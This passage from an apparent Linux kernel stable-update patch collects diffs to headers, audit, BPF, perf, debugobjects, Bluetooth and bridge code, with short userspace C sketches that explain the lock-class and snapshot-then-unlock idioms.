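	*p++ = (val >> 8) & 0xff;
	*p++ = val & 0xff;
}

static uint32_t get_unaligned_be24(const uint8_t *p)
{
	return ((uint32_t)p[0] << 16) | ((uint32_t)p[1] << 8) | p[2];
}

int main(void)
{
	uint8_t buf[3];

	put_unaligned_be24(0x00123456, buf);
	printf("bytes: %02x %02x %02x, roundtrip: 0x%06x\n",
	       buf[0], buf[1], buf[2], get_unaligned_be24(buf));
	return 0;
}
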
+diff --git a/include/drm/drm_color_mgmt.h b/include/drm/drm_color_mgmt.h
+index 81c298488b0c8..6b5eec10c3db3 100644
+--- a/include/drm/drm_color_mgmt.h
++++ b/include/drm/drm_color_mgmt.h
+@@ -24,6 +24,7 @@
+ #define __DRM_COLOR_MGMT_H__
+ 
+ #include <linux/ctype.h>
++#include <linux/math64.h>
+ #include <drm/drm_property.h>
+ 
+ struct drm_crtc;
+diff --git a/include/drm/drm_mipi_dsi.h b/include/drm/drm_mipi_dsi.h
+index 9054a5185e1a9..31171914990a3 100644
+--- a/include/drm/drm_mipi_dsi.h
++++ b/include/drm/drm_mipi_dsi.h
+@@ -168,6 +168,7 @@ struct mipi_dsi_device_info {
+  * struct mipi_dsi_device - DSI peripheral device
+  * @host: DSI host for this peripheral
+  * @dev: driver model device node for this peripheral
++ * @attached: the DSI device has been successfully attached
+  * @name: DSI peripheral chip type
+  * @channel: virtual channel assigned to the peripheral
+  * @format: pixel format for video mode
+@@ -184,6 +185,7 @@ struct mipi_dsi_device_info {
+ struct mipi_dsi_device {
+ 	struct mipi_dsi_host *host;
+ 	struct device dev;
++	bool attached;
+ 
+ 	char name[DSI_DEV_NAME_SIZE];
+ 	unsigned int channel;
+diff --git a/include/linux/irq_work.h b/include/linux/irq_work.h
+index 8cd11a2232605..136f2980cba30 100644
+--- a/include/linux/irq_work.h
++++ b/include/linux/irq_work.h
+@@ -66,6 +66,9 @@ void irq_work_sync(struct irq_work *work);
+ void irq_work_run(void);
+ bool irq_work_needs_cpu(void);
+ void irq_work_single(void *arg);
++
++void arch_irq_work_raise(void);
++
+ #else
+ static inline bool irq_work_needs_cpu(void) { return false; }
+ static inline void irq_work_run(void) { }
+diff --git a/include/linux/mmzone.h b/include/linux/mmzone.h
+index 638d2124d1cb9..3b9f4d7c40c38 100644
+--- a/include/linux/mmzone.h
++++ b/include/linux/mmzone.h
+@@ -1854,9 +1854,9 @@ static inline int pfn_valid(unsigned long pfn)
+ 	if (pfn_to_section_nr(pfn) >= NR_MEM_SECTIONS)
+ 		return 0;
+ 	ms = __pfn_to_section(pfn);
+-	rcu_read_lock();
++	rcu_read_lock_sched();
+ 	if (!valid_section(ms)) {
+-		rcu_read_unlock();
++		rcu_read_unlock_sched();
+ 		return 0;
+ 	}
+ 	/*
+@@ -1864,7 +1864,7 @@ static inline int pfn_valid(unsigned long pfn)
+ 	 * the entire section-sized span.
+ 	 */
+ 	ret = early_section(ms) || pfn_section_valid(ms, pfn);
+-	rcu_read_unlock();
++	rcu_read_unlock_sched();
+ 
+ 	return ret;
+ }
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b76ff08506181..73cc1e7dd15ad 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3000,6 +3000,7 @@
+ #define PCI_DEVICE_ID_INTEL_82443GX_0	0x71a0
+ #define PCI_DEVICE_ID_INTEL_82443GX_2	0x71a2
+ #define PCI_DEVICE_ID_INTEL_82372FB_1	0x7601
++#define PCI_DEVICE_ID_INTEL_HDA_ARL	0x7728
+ #define PCI_DEVICE_ID_INTEL_SCH_LPC	0x8119
+ #define PCI_DEVICE_ID_INTEL_SCH_IDE	0x811a
+ #define PCI_DEVICE_ID_INTEL_E6XX_CU	0x8183
+diff --git a/include/net/af_unix.h b/include/net/af_unix.h
+index 55ca217c626b7..0920b669b9b31 100644
+--- a/include/net/af_unix.h
++++ b/include/net/af_unix.h
+@@ -45,12 +45,6 @@ struct scm_stat {
+ 
+ #define UNIXCB(skb)	(*(struct unix_skb_parms *)&((skb)->cb))
+ 
+-#define unix_state_lock(s)	spin_lock(&unix_sk(s)->lock)
+-#define unix_state_unlock(s)	spin_unlock(&unix_sk(s)->lock)
+-#define unix_state_lock_nested(s) \
+-				spin_lock_nested(&unix_sk(s)->lock, \
+-				SINGLE_DEPTH_NESTING)
+-
+ /* The AF_UNIX socket */
+ struct unix_sock {
+ 	/* WARNING: sk has to be the first member */
+@@ -79,6 +73,20 @@ static inline struct unix_sock *unix_sk(const struct sock *sk)
+ }
+ #define unix_peer(sk) (unix_sk(sk)->peer)
+ 
++#define unix_state_lock(s)	spin_lock(&unix_sk(s)->lock)
++#define unix_state_unlock(s)	spin_unlock(&unix_sk(s)->lock)
++enum unix_socket_lock_class {
++	U_LOCK_NORMAL,
++	U_LOCK_SECOND,	/* for double locking, see unix_state_double_lock(). */
++	U_LOCK_DIAG, /* used while dumping icons, see sk_diag_dump_icons(). */
++};
++
++static inline void unix_state_lock_nested(struct sock *sk,
++				   enum unix_socket_lock_class subclass)
++{
++	spin_lock_nested(&unix_sk(sk)->lock, subclass);
++}
++
+ #define peer_wait peer_wq.wait
+ 
+ long unix_inq_len(struct sock *sk);
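
Turning the unix_state_lock_nested() macro into a function with an explicit lock-class enum lets lockdep tell the legitimate nesting sites apart instead of collapsing them into SINGLE_DEPTH_NESTING. Userspace has no lockdep, but the shape of the API is just this (the subclass is pure annotation in the sketch):

#include <pthread.h>
#include <stdio.h>

enum unix_socket_lock_class {
	U_LOCK_NORMAL,
	U_LOCK_SECOND,   /* second lock of a double-lock pair */
	U_LOCK_DIAG,     /* diagnostic dump path */
};

struct unix_sock { pthread_mutex_t lock; };

/* userspace stand-in: the subclass does nothing here, but in the kernel
 * spin_lock_nested() feeds it to lockdep's deadlock checker */
static void unix_state_lock_nested(struct unix_sock *u,
				   enum unix_socket_lock_class subclass)
{
	(void)subclass;
	pthread_mutex_lock(&u->lock);
}

int main(void)
{
	struct unix_sock u = { PTHREAD_MUTEX_INITIALIZER };

	unix_state_lock_nested(&u, U_LOCK_SECOND);
	pthread_mutex_unlock(&u.lock);
	printf("locked and unlocked with subclass annotation\n");
	return 0;
}
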
+diff --git a/include/net/ip.h b/include/net/ip.h
+index c83c09c65623f..4f11f7df7dd67 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -752,7 +752,7 @@ int ip_options_rcv_srr(struct sk_buff *skb, struct net_device *dev);
+  *	Functions provided by ip_sockglue.c
+  */
+ 
+-void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb);
++void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb, bool drop_dst);
+ void ip_cmsg_recv_offset(struct msghdr *msg, struct sock *sk,
+ 			 struct sk_buff *skb, int tlen, int offset);
+ int ip_cmsg_send(struct sock *sk, struct msghdr *msg,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index c726da3b7d68a..2fa344cb66f60 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -1286,6 +1286,7 @@ void nft_obj_notify(struct net *net, const struct nft_table *table,
+  *	@type: stateful object numeric type
+  *	@owner: module owner
+  *	@maxattr: maximum netlink attribute
++ *	@family: address family for AF-specific object types
+  *	@policy: netlink attribute policy
+  */
+ struct nft_object_type {
+@@ -1295,6 +1296,7 @@ struct nft_object_type {
+ 	struct list_head		list;
+ 	u32				type;
+ 	unsigned int                    maxattr;
++	u8				family;
+ 	struct module			*owner;
+ 	const struct nla_policy		*policy;
+ };
+diff --git a/kernel/audit.c b/kernel/audit.c
+index 9bc0b0301198c..99127521cda86 100644
+--- a/kernel/audit.c
++++ b/kernel/audit.c
+@@ -488,15 +488,19 @@ static void auditd_conn_free(struct rcu_head *rcu)
+  * @pid: auditd PID
+  * @portid: auditd netlink portid
+  * @net: auditd network namespace pointer
++ * @skb: the netlink command from the audit daemon
++ * @ack: netlink ack flag, cleared if ack'd here
+  *
+  * Description:
+  * This function will obtain and drop network namespace references as
+  * necessary.  Returns zero on success, negative values on failure.
+  */
+-static int auditd_set(struct pid *pid, u32 portid, struct net *net)
++static int auditd_set(struct pid *pid, u32 portid, struct net *net,
++		      struct sk_buff *skb, bool *ack)
+ {
+ 	unsigned long flags;
+ 	struct auditd_connection *ac_old, *ac_new;
++	struct nlmsghdr *nlh;
+ 
+ 	if (!pid || !net)
+ 		return -EINVAL;
+@@ -508,6 +512,13 @@ static int auditd_set(struct pid *pid, u32 portid, struct net *net)
+ 	ac_new->portid = portid;
+ 	ac_new->net = get_net(net);
+ 
++	/* send the ack now to avoid a race with the queue backlog */
++	if (*ack) {
++		nlh = nlmsg_hdr(skb);
++		netlink_ack(skb, nlh, 0, NULL);
++		*ack = false;
++	}
++
+ 	spin_lock_irqsave(&auditd_conn_lock, flags);
+ 	ac_old = rcu_dereference_protected(auditd_conn,
+ 					   lockdep_is_held(&auditd_conn_lock));
+@@ -1201,7 +1212,8 @@ static int audit_replace(struct pid *pid)
+ 	return auditd_send_unicast_skb(skb);
+ }
+ 
+-static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
++static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh,
++			     bool *ack)
+ {
+ 	u32			seq;
+ 	void			*data;
+@@ -1294,7 +1306,8 @@ static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
+ 				/* register a new auditd connection */
+ 				err = auditd_set(req_pid,
+ 						 NETLINK_CB(skb).portid,
+-						 sock_net(NETLINK_CB(skb).sk));
++						 sock_net(NETLINK_CB(skb).sk),
++						 skb, ack);
+ 				if (audit_enabled != AUDIT_OFF)
+ 					audit_log_config_change("audit_pid",
+ 								new_pid,
+@@ -1539,9 +1552,10 @@ static int audit_receive_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
+  * Parse the provided skb and deal with any messages that may be present,
+  * malformed skbs are discarded.
+  */
+-static void audit_receive(struct sk_buff  *skb)
++static void audit_receive(struct sk_buff *skb)
+ {
+ 	struct nlmsghdr *nlh;
++	bool ack;
+ 	/*
+ 	 * len MUST be signed for nlmsg_next to be able to dec it below 0
+ 	 * if the nlmsg_len was not aligned
+@@ -1554,9 +1568,12 @@ static void audit_receive(struct sk_buff  *skb)
+ 
+ 	audit_ctl_lock();
+ 	while (nlmsg_ok(nlh, len)) {
+-		err = audit_receive_msg(skb, nlh);
+-		/* if err or if this message says it wants a response */
+-		if (err || (nlh->nlmsg_flags & NLM_F_ACK))
++		ack = nlh->nlmsg_flags & NLM_F_ACK;
++		err = audit_receive_msg(skb, nlh, &ack);
++
++		/* send an ack if the user asked for one and audit_receive_msg
++		 * didn't already do it, or if there was an error. */
++		if (ack || err)
+ 			netlink_ack(skb, nlh, err, NULL);
+ 
+ 		nlh = nlmsg_next(nlh, &len);
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 6212e4ae084bb..34135fbd6097e 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -28,12 +28,13 @@
+  *
+  * Different map implementations will rely on rcu in map methods
+  * lookup/update/delete, therefore eBPF programs must run under rcu lock
+- * if program is allowed to access maps, so check rcu_read_lock_held in
+- * all three functions.
++ * if program is allowed to access maps, so check rcu_read_lock_held() or
++ * rcu_read_lock_trace_held() in all three functions.
+  */
+ BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return (unsigned long) map->ops->map_lookup_elem(map, key);
+ }
+ 
+@@ -49,7 +50,8 @@ const struct bpf_func_proto bpf_map_lookup_elem_proto = {
+ BPF_CALL_4(bpf_map_update_elem, struct bpf_map *, map, void *, key,
+ 	   void *, value, u64, flags)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return map->ops->map_update_elem(map, key, value, flags);
+ }
+ 
+@@ -66,7 +68,8 @@ const struct bpf_func_proto bpf_map_update_elem_proto = {
+ 
+ BPF_CALL_2(bpf_map_delete_elem, struct bpf_map *, map, void *, key)
+ {
+-	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_bh_held());
++	WARN_ON_ONCE(!rcu_read_lock_held() && !rcu_read_lock_trace_held() &&
++		     !rcu_read_lock_bh_held());
+ 	return map->ops->map_delete_elem(map, key);
+ }
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 8d0c38a8dcf2d..1e46a84694b8a 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -1598,6 +1598,9 @@ int generic_map_delete_batch(struct bpf_map *map,
+ 	if (!max_count)
+ 		return 0;
+ 
++	if (put_user(0, &uattr->batch.count))
++		return -EFAULT;
++
+ 	key = kvmalloc(map->key_size, GFP_USER | __GFP_NOWARN);
+ 	if (!key)
+ 		return -ENOMEM;
+@@ -1657,6 +1660,9 @@ int generic_map_update_batch(struct bpf_map *map,
+ 	if (!max_count)
+ 		return 0;
+ 
++	if (put_user(0, &uattr->batch.count))
++		return -EFAULT;
++
+ 	key = kvmalloc(map->key_size, GFP_USER | __GFP_NOWARN);
+ 	if (!key)
+ 		return -ENOMEM;
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8c7d2f4f5fbab..872d149b1959b 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -11223,9 +11223,30 @@ static DEVICE_ATTR_RW(perf_event_mux_interval_ms);
+ static struct attribute *pmu_dev_attrs[] = {
+ 	&dev_attr_type.attr,
+ 	&dev_attr_perf_event_mux_interval_ms.attr,
++	&dev_attr_nr_addr_filters.attr,
++	NULL,
++};
++
++static umode_t pmu_dev_is_visible(struct kobject *kobj, struct attribute *a, int n)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct pmu *pmu = dev_get_drvdata(dev);
++
++	if (n == 2 && !pmu->nr_addr_filters)
++		return 0;
++
++	return a->mode;
++}
++
++static struct attribute_group pmu_dev_attr_group = {
++	.is_visible = pmu_dev_is_visible,
++	.attrs = pmu_dev_attrs,
++};
++
++static const struct attribute_group *pmu_dev_groups[] = {
++	&pmu_dev_attr_group,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmu_dev);
+ 
+ static int pmu_bus_running;
+ static struct bus_type pmu_bus = {
+@@ -11261,18 +11282,11 @@ static int pmu_dev_alloc(struct pmu *pmu)
+ 	if (ret)
+ 		goto free_dev;
+ 
+-	/* For PMUs with address filters, throw in an extra attribute: */
+-	if (pmu->nr_addr_filters)
+-		ret = device_create_file(pmu->dev, &dev_attr_nr_addr_filters);
+-
+-	if (ret)
+-		goto del_dev;
+-
+-	if (pmu->attr_update)
++	if (pmu->attr_update) {
+ 		ret = sysfs_update_groups(&pmu->dev->kobj, pmu->attr_update);
+-
+-	if (ret)
+-		goto del_dev;
++		if (ret)
++			goto del_dev;
++	}
+ 
+ out:
+ 	return ret;
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index dacb80c22c4f1..5dfa582dbadd2 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -609,9 +609,8 @@ static void debug_objects_fill_pool(void)
+ static void
+ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+ 	debug_objects_fill_pool();
+@@ -632,24 +631,18 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	case ODEBUG_STATE_INIT:
+ 	case ODEBUG_STATE_INACTIVE:
+ 		obj->state = ODEBUG_STATE_INIT;
+-		break;
+-
+-	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "init");
+-		debug_object_fixup(descr->fixup_init, addr, state);
+-		return;
+-
+-	case ODEBUG_STATE_DESTROYED:
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "init");
+ 		return;
+ 	default:
+ 		break;
+ 	}
+ 
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "init");
++
++	if (o.state == ODEBUG_STATE_ACTIVE)
++		debug_object_fixup(descr->fixup_init, addr, o.state);
+ }
+ 
+ /**
+@@ -690,11 +683,9 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
+ 	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+-	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	int ret;
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+@@ -706,49 +697,38 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object_or_alloc(addr, db, descr, false, true);
+-	if (likely(!IS_ERR_OR_NULL(obj))) {
+-		bool print_object = false;
+-
++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return 0;
++	} else if (likely(!IS_ERR(obj))) {
+ 		switch (obj->state) {
+-		case ODEBUG_STATE_INIT:
+-		case ODEBUG_STATE_INACTIVE:
+-			obj->state = ODEBUG_STATE_ACTIVE;
+-			ret = 0;
+-			break;
+-
+ 		case ODEBUG_STATE_ACTIVE:
+-			state = obj->state;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_print_object(obj, "activate");
+-			ret = debug_object_fixup(descr->fixup_activate, addr, state);
+-			return ret ? 0 : -EINVAL;
+-
+ 		case ODEBUG_STATE_DESTROYED:
+-			print_object = true;
+-			ret = -EINVAL;
++			o = *obj;
+ 			break;
++		case ODEBUG_STATE_INIT:
++		case ODEBUG_STATE_INACTIVE:
++			obj->state = ODEBUG_STATE_ACTIVE;
++			fallthrough;
+ 		default:
+-			ret = 0;
+-			break;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return 0;
+ 		}
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		if (print_object)
+-			debug_print_object(obj, "activate");
+-		return ret;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "activate");
+ 
+-	/* If NULL the allocation has hit OOM */
+-	if (!obj) {
+-		debug_objects_oom();
+-		return 0;
++	switch (o.state) {
++	case ODEBUG_STATE_ACTIVE:
++	case ODEBUG_STATE_NOTAVAILABLE:
++		if (debug_object_fixup(descr->fixup_activate, addr, o.state))
++			return 0;
++		fallthrough;
++	default:
++		return -EINVAL;
+ 	}
+-
+-	/* Object is neither static nor tracked. It's not initialized */
+-	debug_print_object(&o, "activate");
+-	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
+-	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -759,10 +739,10 @@ EXPORT_SYMBOL_GPL(debug_object_activate);
+  */
+ void debug_object_deactivate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -774,33 +754,24 @@ void debug_object_deactivate(void *addr, const struct debug_obj_descr *descr)
+ 	obj = lookup_object(addr, db);
+ 	if (obj) {
+ 		switch (obj->state) {
++		case ODEBUG_STATE_DESTROYED:
++			break;
+ 		case ODEBUG_STATE_INIT:
+ 		case ODEBUG_STATE_INACTIVE:
+ 		case ODEBUG_STATE_ACTIVE:
+-			if (!obj->astate)
+-				obj->state = ODEBUG_STATE_INACTIVE;
+-			else
+-				print_object = true;
+-			break;
+-
+-		case ODEBUG_STATE_DESTROYED:
+-			print_object = true;
+-			break;
++			if (obj->astate)
++				break;
++			obj->state = ODEBUG_STATE_INACTIVE;
++			fallthrough;
+ 		default:
+-			break;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return;
+ 		}
++		o = *obj;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		debug_print_object(&o, "deactivate");
+-	} else if (print_object) {
+-		debug_print_object(obj, "deactivate");
+-	}
++	debug_print_object(&o, "deactivate");
+ }
+ EXPORT_SYMBOL_GPL(debug_object_deactivate);
+ 
+@@ -811,11 +782,9 @@ EXPORT_SYMBOL_GPL(debug_object_deactivate);
+  */
+ void debug_object_destroy(void *addr, const struct debug_obj_descr *descr)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -825,32 +794,31 @@ void debug_object_destroy(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object(addr, db);
+-	if (!obj)
+-		goto out_unlock;
++	if (!obj) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		return;
++	}
+ 
+ 	switch (obj->state) {
++	case ODEBUG_STATE_ACTIVE:
++	case ODEBUG_STATE_DESTROYED:
++		break;
+ 	case ODEBUG_STATE_NONE:
+ 	case ODEBUG_STATE_INIT:
+ 	case ODEBUG_STATE_INACTIVE:
+ 		obj->state = ODEBUG_STATE_DESTROYED;
+-		break;
+-	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
++		fallthrough;
++	default:
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "destroy");
+-		debug_object_fixup(descr->fixup_destroy, addr, state);
+ 		return;
+-
+-	case ODEBUG_STATE_DESTROYED:
+-		print_object = true;
+-		break;
+-	default:
+-		break;
+ 	}
+-out_unlock:
++
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (print_object)
+-		debug_print_object(obj, "destroy");
++	debug_print_object(&o, "destroy");
++
++	if (o.state == ODEBUG_STATE_ACTIVE)
++		debug_object_fixup(descr->fixup_destroy, addr, o.state);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_destroy);
+ 
+@@ -861,9 +829,8 @@ EXPORT_SYMBOL_GPL(debug_object_destroy);
+  */
+ void debug_object_free(void *addr, const struct debug_obj_descr *descr)
+ {
+-	enum debug_obj_state state;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+-	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+ 	if (!debug_objects_enabled)
+@@ -874,24 +841,26 @@ void debug_object_free(void *addr, const struct debug_obj_descr *descr)
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+ 	obj = lookup_object(addr, db);
+-	if (!obj)
+-		goto out_unlock;
++	if (!obj) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		return;
++	}
+ 
+ 	switch (obj->state) {
+ 	case ODEBUG_STATE_ACTIVE:
+-		state = obj->state;
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		debug_print_object(obj, "free");
+-		debug_object_fixup(descr->fixup_free, addr, state);
+-		return;
++		break;
+ 	default:
+ 		hlist_del(&obj->node);
+ 		raw_spin_unlock_irqrestore(&db->lock, flags);
+ 		free_object(obj);
+ 		return;
+ 	}
+-out_unlock:
++
++	o = *obj;
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
++	debug_print_object(&o, "free");
++
++	debug_object_fixup(descr->fixup_free, addr, o.state);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_free);
+ 
+@@ -943,10 +912,10 @@ void
+ debug_object_active_state(void *addr, const struct debug_obj_descr *descr,
+ 			  unsigned int expect, unsigned int next)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+-	bool print_object = false;
+ 
+ 	if (!debug_objects_enabled)
+ 		return;
+@@ -959,28 +928,19 @@ debug_object_active_state(void *addr, const struct debug_obj_descr *descr,
+ 	if (obj) {
+ 		switch (obj->state) {
+ 		case ODEBUG_STATE_ACTIVE:
+-			if (obj->astate == expect)
+-				obj->astate = next;
+-			else
+-				print_object = true;
+-			break;
+-
++			if (obj->astate != expect)
++				break;
++			obj->astate = next;
++			raw_spin_unlock_irqrestore(&db->lock, flags);
++			return;
+ 		default:
+-			print_object = true;
+ 			break;
+ 		}
++		o = *obj;
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		debug_print_object(&o, "active_state");
+-	} else if (print_object) {
+-		debug_print_object(obj, "active_state");
+-	}
++	debug_print_object(&o, "active_state");
+ }
+ EXPORT_SYMBOL_GPL(debug_object_active_state);
+ 
+@@ -988,12 +948,10 @@ EXPORT_SYMBOL_GPL(debug_object_active_state);
+ static void __debug_check_no_obj_freed(const void *address, unsigned long size)
+ {
+ 	unsigned long flags, oaddr, saddr, eaddr, paddr, chunks;
+-	const struct debug_obj_descr *descr;
+-	enum debug_obj_state state;
++	int cnt, objs_checked = 0;
++	struct debug_obj *obj, o;
+ 	struct debug_bucket *db;
+ 	struct hlist_node *tmp;
+-	struct debug_obj *obj;
+-	int cnt, objs_checked = 0;
+ 
+ 	saddr = (unsigned long) address;
+ 	eaddr = saddr + size;
+@@ -1015,12 +973,10 @@ repeat:
+ 
+ 			switch (obj->state) {
+ 			case ODEBUG_STATE_ACTIVE:
+-				descr = obj->descr;
+-				state = obj->state;
++				o = *obj;
+ 				raw_spin_unlock_irqrestore(&db->lock, flags);
+-				debug_print_object(obj, "free");
+-				debug_object_fixup(descr->fixup_free,
+-						   (void *) oaddr, state);
++				debug_print_object(&o, "free");
++				debug_object_fixup(o.descr->fixup_free, (void *)oaddr, o.state);
+ 				goto repeat;
+ 			default:
+ 				hlist_del(&obj->node);
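
The debugobjects rework applies one pattern throughout: snapshot the object into a stack copy while the bucket lock is held, drop the lock, then report or run fixups from the copy, so the printing path never touches an object another CPU may free. The snapshot-then-unlock idiom with a pthread mutex:

#include <pthread.h>
#include <stdio.h>

struct debug_obj {
	int state;
	const char *name;
};

static pthread_mutex_t db_lock = PTHREAD_MUTEX_INITIALIZER;
static struct debug_obj tracked = { 1, "timer" };

static void report(void)
{
	struct debug_obj o;

	pthread_mutex_lock(&db_lock);
	o = tracked;                  /* snapshot while protected */
	pthread_mutex_unlock(&db_lock);

	/* safe: works on the private copy, lock already dropped */
	printf("object %s in state %d\n", o.name, o.state);
}

int main(void)
{
	report();
	return 0;
}
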
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index d74fe13f3dceb..45d19294aa772 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3780,12 +3780,14 @@ static int hci_set_event_mask_sync(struct hci_dev *hdev)
+ 	if (lmp_bredr_capable(hdev)) {
+ 		events[4] |= 0x01; /* Flow Specification Complete */
+ 
+-		/* Don't set Disconnect Complete when suspended as that
+-		 * would wakeup the host when disconnecting due to
+-		 * suspend.
++		/* Don't set Disconnect Complete and mode change when
++		 * suspended as that would wakeup the host when disconnecting
++		 * due to suspend.
+ 		 */
+-		if (hdev->suspended)
++		if (hdev->suspended) {
+ 			events[0] &= 0xef;
++			events[2] &= 0xf7;
++		}
+ 	} else {
+ 		/* Use a different default for LE-only devices */
+ 		memset(events, 0, sizeof(events));
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 4c5793053393f..81f5974e5eb5a 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6527,7 +6527,8 @@ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 		if (len > skb->len || !cmd->ident) {
+ 			BT_DBG("corrupted command");
+ 			l2cap_sig_send_rej(conn, cmd->ident);
+-			break;
++			skb_pull(skb, len > skb->len ? skb->len : len);
++			continue;
+ 		}
+ 
+ 		err = l2cap_bredr_sig_cmd(conn, cmd, len, skb->data);
+diff --git a/net/bridge/br_cfm_netlink.c b/net/bridge/br_cfm_netlink.c
+index 5c4c369f8536e..2faab44652e7c 100644
+--- a/net/bridge/br_cfm_netlink.c
++++ b/net/bridge/br_cfm_netlink.c
+@@ -362,7 +362,7 @@ static int br_cc_ccm_tx_parse(struct net_bridge *br, struct nlattr *attr,
+ 
+ 	memset(&tx_info, 0, sizeof(tx_info));
+ 
+-	instance = nla_get_u32(tb[IFLA_BRIDGE_CFM_CC_RDI_INSTANCE]);
++	instance = nla_get_u32(tb[IFLA_BRIDGE_CFM_CC_CCM_TX_INSTANCE]);
+ 	nla_memcpy(&tx_info.dmac.addr,
